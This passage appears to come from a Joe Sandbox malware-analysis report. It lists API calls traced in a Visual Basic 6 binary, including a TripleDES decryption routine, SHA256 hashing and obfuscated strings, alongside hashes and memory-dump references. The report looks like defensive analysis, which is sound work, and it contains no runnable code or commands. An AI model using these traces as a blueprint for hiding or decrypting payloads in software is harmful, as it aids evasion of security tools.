                                                          • __vbaOnError.MSVBVM60(00000001,00000000,-00000001,6D4245C1), ref: 0042A5DE
                                                            • Part of subcall function 0042EA80: __vbaLenBstr.MSVBVM60(00000000,00402700,00000000,6D42D8B1), ref: 0042EAC9
                                                            • Part of subcall function 0042EA80: __vbaLenBstr.MSVBVM60 ref: 0042EAD7
                                                            • Part of subcall function 0042EA80: __vbaFpI4.MSVBVM60 ref: 0042EB11
                                                            • Part of subcall function 0042EA80: __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000), ref: 0042EB31
                                                            • Part of subcall function 0042EA80: __vbaUbound.MSVBVM60(00000001,?), ref: 0042EB40
                                                            • Part of subcall function 0042EA80: __vbaGenerateBoundsError.MSVBVM60 ref: 0042EB80
                                                            • Part of subcall function 0042EA80: #631.MSVBVM60(?,?,?,0040A4B0), ref: 0042EBB4
                                                            • Part of subcall function 0042EA80: __vbaStrMove.MSVBVM60 ref: 0042EBBF
                                                            • Part of subcall function 0042EA80: __vbaStrCat.MSVBVM60(00000000), ref: 0042EBC2
                                                            • Part of subcall function 0042EA80: __vbaStrMove.MSVBVM60 ref: 0042EBCD
                                                          • __vbaAryMove.MSVBVM60(?,?,00402308), ref: 0042A5FE
                                                          • #716.MSVBVM60(?,System.Security.Cryptography.TripleDESCryptoServiceProvider,00000000), ref: 0042A60E
                                                          • __vbaVarZero.MSVBVM60 ref: 0042A61D
                                                          • __vbaVarLateMemSt.MSVBVM60(?,Mode), ref: 0042A655
                                                          • __vbaVarLateMemSt.MSVBVM60(?,Padding), ref: 0042A67D
                                                          • __vbaVarLateMemSt.MSVBVM60(?,Key), ref: 0042A6A5
                                                            • Part of subcall function 0042EA80: _adj_fdiv_m64.MSVBVM60 ref: 0042EB02
                                                            • Part of subcall function 0042EA80: __vbaGenerateBoundsError.MSVBVM60 ref: 0042EB88
                                                            • Part of subcall function 0042EA80: #581.MSVBVM60(00000000), ref: 0042EBD0
                                                            • Part of subcall function 0042EA80: __vbaFpUI1.MSVBVM60 ref: 0042EBD6
                                                            • Part of subcall function 0042EA80: __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0042EBEF
                                                            • Part of subcall function 0042EA80: __vbaFreeVar.MSVBVM60 ref: 0042EBFB
                                                            • Part of subcall function 0042EA80: __vbaAryCopy.MSVBVM60(?,?), ref: 0042EC1F
                                                            • Part of subcall function 0042EA80: __vbaAryDestruct.MSVBVM60(00000000,?,0042EC89), ref: 0042EC7E
                                                            • Part of subcall function 0042EA80: __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042EC86
                                                          • __vbaVarLateMemSt.MSVBVM60(?,0040A658), ref: 0042A6DD
                                                          • __vbaFreeVar.MSVBVM60 ref: 0042A6E8
                                                          • __vbaVarLateMemCallLd.MSVBVM60(?,?,CreateDecryptor,00000000), ref: 0042A6FC
                                                          • __vbaObjVar.MSVBVM60(00000000), ref: 0042A706
                                                          • __vbaObjSetAddref.MSVBVM60(?,00000000), ref: 0042A711
                                                          • __vbaFreeVar.MSVBVM60 ref: 0042A71A
                                                          • __vbaUbound.MSVBVM60(00000001,?), ref: 0042A729
                                                          • __vbaLateMemCallLd.MSVBVM60(?,?,TransformFinalBlock,00000003), ref: 0042A79B
                                                          • __vbaVar2Vec.MSVBVM60(?,00000000), ref: 0042A7A9
                                                          • __vbaAryMove.MSVBVM60(?,?), ref: 0042A7B7
                                                          • __vbaFreeVar.MSVBVM60 ref: 0042A7C0
                                                          • __vbaUbound.MSVBVM60(00000001,?), ref: 0042A7C8
                                                            • Part of subcall function 0042E8C0: __vbaStrCopy.MSVBVM60(6D42D8B1,00000000,00000000), ref: 0042E902
                                                            • Part of subcall function 0042E8C0: __vbaGenerateBoundsError.MSVBVM60 ref: 0042E941
                                                            • Part of subcall function 0042E8C0: __vbaStrUI1.MSVBVM60(?), ref: 0042E95A
                                                            • Part of subcall function 0042E8C0: __vbaStrMove.MSVBVM60 ref: 0042E965
                                                            • Part of subcall function 0042E8C0: __vbaStrCmp.MSVBVM60(0040796C,00000000), ref: 0042E96D
                                                            • Part of subcall function 0042E8C0: __vbaFreeStr.MSVBVM60 ref: 0042E980
                                                            • Part of subcall function 0042E8C0: __vbaGenerateBoundsError.MSVBVM60 ref: 0042E9B7
                                                            • Part of subcall function 0042E8C0: #608.MSVBVM60(?,00000000), ref: 0042E9D6
                                                            • Part of subcall function 0042E8C0: __vbaVarAdd.MSVBVM60(?,?,00000008), ref: 0042E9E8
                                                            • Part of subcall function 0042E8C0: __vbaStrVarMove.MSVBVM60(00000000), ref: 0042E9EF
                                                          • __vbaStrMove.MSVBVM60(?,?), ref: 0042A844
                                                          • __vbaExitProc.MSVBVM60 ref: 0042A84A
                                                          • __vbaFreeVar.MSVBVM60(0042A8E4), ref: 0042A882
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042A897
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042A8A2
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042A8AD
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042A8B8
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042A8C0
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042A8C8
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042A8D0
                                                          • __vbaFreeObj.MSVBVM60 ref: 0042A8D5
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042A8E1
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 0042A8FA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Destruct$Free$Move$ErrorLate$BoundsGenerate$Ubound$BstrCallCopy$#581#608#631#716AddrefExitListOverflowProcRedimVar2Zero_adj_fdiv_m64
                                                          • String ID: CreateDecryptor$Key$Mode$Padding$System.Security.Cryptography.TripleDESCryptoServiceProvider$TransformFinalBlock
                                                          • API String ID: 1384324460-2358055711
                                                          • Opcode ID: 1d750582bf1ea40b676b8e4ff6ce9f9953aaa87f8a4cf24ddf3ffd135e8502ba
                                                          • Instruction ID: 01a5032805ddd56ad328cc477738bf7d68bd4cdd90ae44a414f0d5a95c3ad2fb
                                                          • Opcode Fuzzy Hash: 1d750582bf1ea40b676b8e4ff6ce9f9953aaa87f8a4cf24ddf3ffd135e8502ba
                                                          • Instruction Fuzzy Hash: 19A13BB1D10218DFDB04DFA8DD45B9DFBB8FB48700F10829AE509A7291D774AA84CFA5
                                                          APIs
                                                          • __vbaStrCopy.MSVBVM60(?,00000000,6D4245C1,?,?,?,?,?,?,?,?,?,?,?,6D4245C1,004030D6), ref: 0042965F
                                                          • #573.MSVBVM60(?,?), ref: 00429680
                                                          • __vbaStrVarMove.MSVBVM60(?), ref: 0042968C
                                                          • __vbaStrMove.MSVBVM60 ref: 00429699
                                                          • __vbaFreeVar.MSVBVM60 ref: 0042969E
                                                          • __vbaLenBstr.MSVBVM60(?), ref: 004296A8
                                                          • __vbaMidStmtBstr.MSVBVM60(00000000,?,00000000,00000009,?), ref: 004296C7
                                                          • #573.MSVBVM60(?,00004003), ref: 004296E2
                                                          • __vbaStrVarMove.MSVBVM60(?), ref: 004296E8
                                                          • __vbaStrMove.MSVBVM60 ref: 004296EF
                                                          • __vbaFreeVar.MSVBVM60 ref: 004296F4
                                                          • __vbaLenBstr.MSVBVM60(?), ref: 004296FE
                                                          • __vbaMidStmtBstr.MSVBVM60(00000000,?,00000000,00000012,?), ref: 0042971D
                                                          • #573.MSVBVM60(?,00004003), ref: 00429738
                                                          • __vbaStrVarMove.MSVBVM60(?), ref: 0042973E
                                                          • __vbaStrMove.MSVBVM60 ref: 00429745
                                                          • __vbaFreeVar.MSVBVM60 ref: 0042974A
                                                          • __vbaLenBstr.MSVBVM60(?), ref: 00429754
                                                          • __vbaMidStmtBstr.MSVBVM60(00000000,?,00000000,0000001B,?), ref: 00429773
                                                          • #573.MSVBVM60(?,00004003), ref: 0042978E
                                                          • __vbaStrVarMove.MSVBVM60(?), ref: 00429794
                                                          • __vbaStrMove.MSVBVM60 ref: 0042979B
                                                          • __vbaFreeVar.MSVBVM60 ref: 004297A0
                                                          • __vbaLenBstr.MSVBVM60(?), ref: 004297AA
                                                          • __vbaMidStmtBstr.MSVBVM60(00000000,?,00000000,00000024,?), ref: 004297C9
                                                          • #573.MSVBVM60(?,00004003), ref: 004297E4
                                                          • __vbaStrVarMove.MSVBVM60(?), ref: 004297EA
                                                          • __vbaStrMove.MSVBVM60 ref: 004297F1
                                                          • __vbaFreeVar.MSVBVM60 ref: 004297F6
                                                          • __vbaLenBstr.MSVBVM60(?), ref: 00429800
                                                          • __vbaMidStmtBstr.MSVBVM60(00000000,?,00000000,0000002D,?), ref: 0042981B
                                                          • __vbaFreeStr.MSVBVM60(0042984B), ref: 00429844
                                                          • __vbaErrorOverflow.MSVBVM60(?), ref: 00429861
                                                          Strings
                                                          • 00000000 00000000 00000000 00000000 00000000, xrefs: 0042964B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$BstrMove$Free$#573Stmt$CopyErrorOverflow
                                                          • String ID: 00000000 00000000 00000000 00000000 00000000
                                                          • API String ID: 4201252254-3035815846
                                                          • Opcode ID: 41cf33ce675ed9976c58cbf419c0021008f704f953fe3d26b9af8e41ebfd7848
                                                          • Instruction ID: 38b625a2d4f95f3f97c8a4323f0217025cab8143b4f66fbd1494fae116b0ca2c
                                                          • Opcode Fuzzy Hash: 41cf33ce675ed9976c58cbf419c0021008f704f953fe3d26b9af8e41ebfd7848
                                                          • Instruction Fuzzy Hash: B361C7B1910119AFDF04EFA4DD88EEEBBB8FF88701F00452AE506B3164EB746945CB64
                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,004030D6), ref: 0042BF5E
                                                          • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004030D6), ref: 0042BF8E
                                                          • __vbaUbound.MSVBVM60(00000001,?,?,?,?,?,004030D6), ref: 0042BFAA
                                                            • Part of subcall function 0042E8C0: __vbaStrCopy.MSVBVM60(6D42D8B1,00000000,00000000), ref: 0042E902
                                                            • Part of subcall function 0042E8C0: __vbaGenerateBoundsError.MSVBVM60 ref: 0042E941
                                                            • Part of subcall function 0042E8C0: __vbaStrUI1.MSVBVM60(?), ref: 0042E95A
                                                            • Part of subcall function 0042E8C0: __vbaStrMove.MSVBVM60 ref: 0042E965
                                                            • Part of subcall function 0042E8C0: __vbaStrCmp.MSVBVM60(0040796C,00000000), ref: 0042E96D
                                                            • Part of subcall function 0042E8C0: __vbaFreeStr.MSVBVM60 ref: 0042E980
                                                            • Part of subcall function 0042E8C0: __vbaGenerateBoundsError.MSVBVM60 ref: 0042E9B7
                                                            • Part of subcall function 0042E8C0: #608.MSVBVM60(?,00000000), ref: 0042E9D6
                                                            • Part of subcall function 0042E8C0: __vbaVarAdd.MSVBVM60(?,?,00000008), ref: 0042E9E8
                                                            • Part of subcall function 0042E8C0: __vbaStrVarMove.MSVBVM60(00000000), ref: 0042E9EF
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,004030D6), ref: 0042BFC5
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,?,004030D6), ref: 0042BFDA
                                                            • Part of subcall function 0042ECB0: __vbaLenBstr.MSVBVM60(?), ref: 0042ECF6
                                                            • Part of subcall function 0042ECB0: #632.MSVBVM60(?,?,?,?), ref: 0042ED52
                                                            • Part of subcall function 0042ECB0: __vbaVarCat.MSVBVM60(?,?,00000008,?), ref: 0042ED68
                                                            • Part of subcall function 0042ECB0: __vbaI4ErrVar.MSVBVM60(00000000), ref: 0042ED6F
                                                            • Part of subcall function 0042ECB0: #537.MSVBVM60(00000000), ref: 0042ED76
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED81
                                                            • Part of subcall function 0042ECB0: __vbaStrCat.MSVBVM60(00000000), ref: 0042ED84
                                                            • Part of subcall function 0042ECB0: __vbaStrMove.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED8B
                                                            • Part of subcall function 0042ECB0: __vbaFreeStr.MSVBVM60(?,6D41E251,00402710,00000000), ref: 0042ED90
                                                            • Part of subcall function 0042ECB0: __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0042EDA8
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,004030D6), ref: 0042BFEE
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,?,004030D6), ref: 0042BFFC
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,004030D6), ref: 0042C010
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,?,004030D6), ref: 0042C01E
                                                          • __vbaStrMove.MSVBVM60 ref: 0042C037
                                                          • __vbaStrCopy.MSVBVM60 ref: 0042C045
                                                          • __vbaStrMove.MSVBVM60 ref: 0042C064
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,6D42D8B1,00000001,6D41A323), ref: 0042DE03
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?), ref: 0042DE39
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?), ref: 0042DE44
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,?), ref: 0042DE47
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0042DE52
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0042DE5B
                                                            • Part of subcall function 0042DDC0: __vbaLenBstr.MSVBVM60(?,00000002,?,?,?), ref: 0042DE79
                                                            • Part of subcall function 0042DDC0: #631.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DE96
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEA1
                                                            • Part of subcall function 0042DDC0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0042DEA4
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB0
                                                            • Part of subcall function 0042DDC0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0042DEB9
                                                            • Part of subcall function 0042DDC0: #608.MSVBVM60(00000002,?,?,?,00000002,?,?,?), ref: 0042DEDA
                                                            • Part of subcall function 0042DDC0: __vbaVarAdd.MSVBVM60(?,00000002,00000008,?,?,?,00000002,?,?,?), ref: 0042DEEC
                                                            • Part of subcall function 0042DDC0: __vbaStrVarMove.MSVBVM60(00000000,?,?,?,00000002,?,?,?), ref: 0042DEF3
                                                            • Part of subcall function 0042DDC0: __vbaStrMove.MSVBVM60(?,?,?,00000002,?,?,?), ref: 0042DEFE
                                                          • __vbaStrMove.MSVBVM60(?,?,?,00000001), ref: 0042C082
                                                          • __vbaInStr.MSVBVM60(00000000,00000000), ref: 0042C08B
                                                            • Part of subcall function 0042DDC0: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,?,00000002,?,?,?), ref: 0042DF0A
                                                            • Part of subcall function 0042DDC0: __vbaStrCopy.MSVBVM60 ref: 0042DF29
                                                            • Part of subcall function 0042DDC0: __vbaFreeStr.MSVBVM60(0042DF6C), ref: 0042DF65
                                                          • __vbaStrMove.MSVBVM60(?,?,?,00000001), ref: 0042C0AB
                                                          • __vbaInStr.MSVBVM60(00000000,00000000), ref: 0042C0B4
                                                          • __vbaFreeStrList.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C0F2
                                                          • __vbaAryMove.MSVBVM60(?,?,00000000,?,?,?,?,?,?,?,?,?,?,004030D6), ref: 0042C11E
                                                            • Part of subcall function 0042C260: __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,0000000B,00000000,?,00000000), ref: 0042C2B8
                                                            • Part of subcall function 0042C260: __vbaUbound.MSVBVM60(00000001,?), ref: 0042C2CD
                                                            • Part of subcall function 0042C260: __vbaFreeVar.MSVBVM60(?,?,?,?,?), ref: 0042C31C
                                                            • Part of subcall function 0042C260: __vbaUbound.MSVBVM60(00000001,?,00000000), ref: 0042C328
                                                            • Part of subcall function 0042C260: __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-0000001F,?,00000000), ref: 0042C34C
                                                            • Part of subcall function 0042C260: __vbaUbound.MSVBVM60(00000001,?), ref: 0042C35B
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004030D6), ref: 0042C13D
                                                          • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,004030D6), ref: 0042C151
                                                          • __vbaAryMove.MSVBVM60(?,?,?,?,00000000,00000000,00000004,00000000), ref: 0042C177
                                                          • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,004030D6), ref: 0042C180
                                                          • __vbaUbound.MSVBVM60(00000001,?,?,?,?,?,?,?,?,?,?,?,004030D6), ref: 0042C193
                                                          • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004030D6), ref: 0042C1AE
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?,0042C23C,?,?,?,?,?,?,?,?,?,?,004030D6), ref: 0042C208
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,004030D6), ref: 0042C214
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,004030D6), ref: 0042C220
                                                          • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,004030D6), ref: 0042C229
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,004030D6), ref: 0042C235
                                                            • Part of subcall function 0042C870: __vbaChkstk.MSVBVM60(?,004030D6,?,?,?,?,0042C113,00000000), ref: 0042C88E
                                                            • Part of subcall function 0042C870: __vbaOnError.MSVBVM60(000000FF,?,00000000,?,?,004030D6), ref: 0042C8BE
                                                            • Part of subcall function 0042C870: __vbaStrCopy.MSVBVM60(?,00000000,?,?,004030D6), ref: 0042C8D3
                                                            • Part of subcall function 0042C870: __vbaStrMove.MSVBVM60(?,?,00000000,?,?,004030D6), ref: 0042C8E7
                                                            • Part of subcall function 0042C870: __vbaStrCopy.MSVBVM60(?,00000000,?,?,004030D6), ref: 0042C8F5
                                                            • Part of subcall function 0042C870: __vbaStrMove.MSVBVM60 ref: 0042C914
                                                            • Part of subcall function 0042C870: __vbaStrMove.MSVBVM60(?,?,00000000), ref: 0042C932
                                                            • Part of subcall function 0042C870: __vbaStrCat.MSVBVM60(00000000), ref: 0042C939
                                                            • Part of subcall function 0042C870: __vbaStrMove.MSVBVM60 ref: 0042C944
                                                            • Part of subcall function 0042C870: __vbaStrMove.MSVBVM60(?), ref: 0042C958
                                                            • Part of subcall function 0042C870: __vbaObjSet.MSVBVM60(?,00000000,?), ref: 0042C96C
                                                            • Part of subcall function 0042C870: __vbaFreeStrList.MSVBVM60(00000007,?,?,?,?,?,?,00000000), ref: 0042C990
                                                            • Part of subcall function 0042C870: __vbaObjIs.MSVBVM60(?,00000000,?,?,?,?,00000000,?,?,004030D6), ref: 0042C9A6
                                                            • Part of subcall function 0042C870: __vbaStrMove.MSVBVM60(?,?,?,?,00000000,?,?,004030D6), ref: 0042C9C8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Free$Copy$Ubound$DestructErrorList$Bstr$#516#608#631BoundsChkstkGenerateRedim$#537#632
                                                          • String ID: 007758$024668$HvFifFDbwWSESPfuPWaeSKl$ItwXjeKuthVRdpXyikTUBGFniKETOLdVtYpxoTfOnqQ
                                                          • API String ID: 1910222529-2368971541
                                                          • Opcode ID: 73f5917d30d4189876d79a935cdd66be53b482578706a6bbf27b8e468115c2ab
                                                          • Instruction ID: 9ac148aa2f327e291eef71a793c195be77bbb942f304428e9ff09502e44eaf3f
                                                          • Opcode Fuzzy Hash: 73f5917d30d4189876d79a935cdd66be53b482578706a6bbf27b8e468115c2ab
                                                          • Instruction Fuzzy Hash: 3391DC76D00208EBDB04DFE0DD89BDEBBB9EF44704F10816AE502B71A4DB746A45CBA4
                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,004030D6,?,?,0042A3EE,?,?,?), ref: 0042B10E
                                                          • __vbaOnError.MSVBVM60(000000FF,00000000,-00000001,6D4245C1,?,004030D6), ref: 0042B13E
                                                          • __vbaUbound.MSVBVM60(00000001,?,00000000), ref: 0042B155
                                                          • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000004,?,00000000), ref: 0042B174
                                                          • __vbaUbound.MSVBVM60(00000001), ref: 0042B18C
                                                            • Part of subcall function 0042ECB0: __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 0042EE3E
                                                            • Part of subcall function 0042ECB0: __vbaOnError.MSVBVM60(000000FF,6D42D8B1,?,6D41A323,00000000,004030D6), ref: 0042EE6E
                                                            • Part of subcall function 0042ECB0: __vbaVarVargNofree.MSVBVM60 ref: 0042EE8F
                                                            • Part of subcall function 0042ECB0: __vbaVarSub.MSVBVM60(?,00000002,00000000), ref: 0042EE9E
                                                            • Part of subcall function 0042ECB0: __vbaI2Var.MSVBVM60(00000000), ref: 0042EEA5
                                                            • Part of subcall function 0042ECB0: __vbaChkstk.MSVBVM60 ref: 0042EF2B
                                                            • Part of subcall function 0042ECB0: __vbaChkstk.MSVBVM60 ref: 0042EF4E
                                                            • Part of subcall function 0042ECB0: __vbaVarIndexLoad.MSVBVM60(?,?,00000001), ref: 0042EF76
                                                            • Part of subcall function 0042ECB0: __vbaChkstk.MSVBVM60 ref: 0042EF86
                                                            • Part of subcall function 0042ECB0: __vbaVarIndexStore.MSVBVM60(00000000,00000001), ref: 0042EFA9
                                                          • __vbaFreeVar.MSVBVM60(00006011,00000000,00006011,00000000,00000003), ref: 0042B1F3
                                                            • Part of subcall function 0042B040: __vbaStrCopy.MSVBVM60(?,?,00000000), ref: 0042B07F
                                                            • Part of subcall function 0042B040: __vbaAryMove.MSVBVM60(?,?,?), ref: 0042B099
                                                            • Part of subcall function 0042B040: __vbaFreeStr.MSVBVM60 ref: 0042B0A2
                                                            • Part of subcall function 0042B040: __vbaAryDestruct.MSVBVM60(00000000,?,0042B0D8), ref: 0042B0D1
                                                          • __vbaAryMove.MSVBVM60(?,?,00000000), ref: 0042B21F
                                                          • __vbaUbound.MSVBVM60(00000001), ref: 0042B23B
                                                          • __vbaI2I4.MSVBVM60 ref: 0042B24C
                                                            • Part of subcall function 0042ECB0: __vbaFreeVar.MSVBVM60 ref: 0042EFB5
                                                          • __vbaFreeVarList.MSVBVM60(00000002,00002011,00000002,00002011,00000000,00006011,00000000,00000002), ref: 0042B2BE
                                                          • __vbaErase.MSVBVM60(00000000,?), ref: 0042B2D0
                                                          • __vbaStrCopy.MSVBVM60 ref: 0042B2E5
                                                            • Part of subcall function 0042B610: __vbaAryConstruct2.MSVBVM60(?,0040AB14,00000011,00000000,-00000001,6D4245C1), ref: 0042B6F4
                                                            • Part of subcall function 0042B610: #527.MSVBVM60(00000000), ref: 0042B700
                                                            • Part of subcall function 0042B610: __vbaStrMove.MSVBVM60 ref: 0042B70E
                                                            • Part of subcall function 0042B610: __vbaStrCmp.MSVBVM60(SHA256,?), ref: 0042B726
                                                            • Part of subcall function 0042B610: __vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000018,F0000000), ref: 0042B7D0
                                                            • Part of subcall function 0042B610: #685.MSVBVM60 ref: 0042B7DE
                                                            • Part of subcall function 0042B610: __vbaObjSet.MSVBVM60(?,00000000), ref: 0042B7EC
                                                            • Part of subcall function 0042B610: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040A9C4,0000004C), ref: 0042B810
                                                            • Part of subcall function 0042B610: __vbaFreeObj.MSVBVM60 ref: 0042B828
                                                          • __vbaFreeStr.MSVBVM60(?,?,?,?), ref: 0042B303
                                                          • __vbaStrCopy.MSVBVM60 ref: 0042B363
                                                            • Part of subcall function 0042B610: __vbaStrCmp.MSVBVM60(SHA384,?), ref: 0042B749
                                                            • Part of subcall function 0042B610: __vbaStrCopy.MSVBVM60 ref: 0042B839
                                                            • Part of subcall function 0042B610: __vbaSetSystemError.MSVBVM60(?), ref: 0042BD22
                                                            • Part of subcall function 0042B610: __vbaSetSystemError.MSVBVM60(?), ref: 0042BD39
                                                            • Part of subcall function 0042B610: __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0042BD4C
                                                            • Part of subcall function 0042B610: __vbaLenBstrB.MSVBVM60(?), ref: 0042BD55
                                                            • Part of subcall function 0042B610: #681.MSVBVM60(?,?,?,?), ref: 0042BDCD
                                                            • Part of subcall function 0042B610: #685.MSVBVM60 ref: 0042BDD3
                                                            • Part of subcall function 0042B610: __vbaObjSet.MSVBVM60(?,00000000), ref: 0042BDE1
                                                            • Part of subcall function 0042B610: __vbaI4Var.MSVBVM60(?,?,?,?,?), ref: 0042BE52
                                                          • __vbaFreeStr.MSVBVM60(?,?,?,?), ref: 0042B381
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0042B41D
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0042B437
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0042B47C
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0042B496
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0042B4DB
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0042B4F5
                                                          • __vbaAryMove.MSVBVM60(?,?), ref: 0042B571
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?,0042B5F4), ref: 0042B5BA
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042B5C9
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042B5D5
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042B5E1
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042B5ED
                                                          • __vbaErrorOverflow.MSVBVM60(?,00000000), ref: 0042B60A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Error$Free$BoundsDestructGenerate$Chkstk$CopyMoveSystem$Ubound$#685Index$#527#681BstrCheckConstruct2EraseHresultListLoadNofreeOverflowRedimStoreVarg
                                                          • String ID: SHA256
                                                          • API String ID: 3250730599-983011835
                                                          • Opcode ID: d4f5b87386d137823817a7a53467dcafebe4e69871276b3ec8502508cdc87600
                                                          • Instruction ID: 47bf7fd41cd0e64c9970cc7131b9fb1e9b697bcdad1a41c0218f7923622d5ba4
                                                          • Opcode Fuzzy Hash: d4f5b87386d137823817a7a53467dcafebe4e69871276b3ec8502508cdc87600
                                                          • Instruction Fuzzy Hash: 3CE15474900218EFDB14DF90EA88BDDBBB5FF48304F50809AE509BB291D7B45A85CF65
                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 004246AE
                                                          • __vbaOnError.MSVBVM60(000000FF,00000000,6D424558,6D4FDAF4,00000000,004030D6), ref: 004246DE
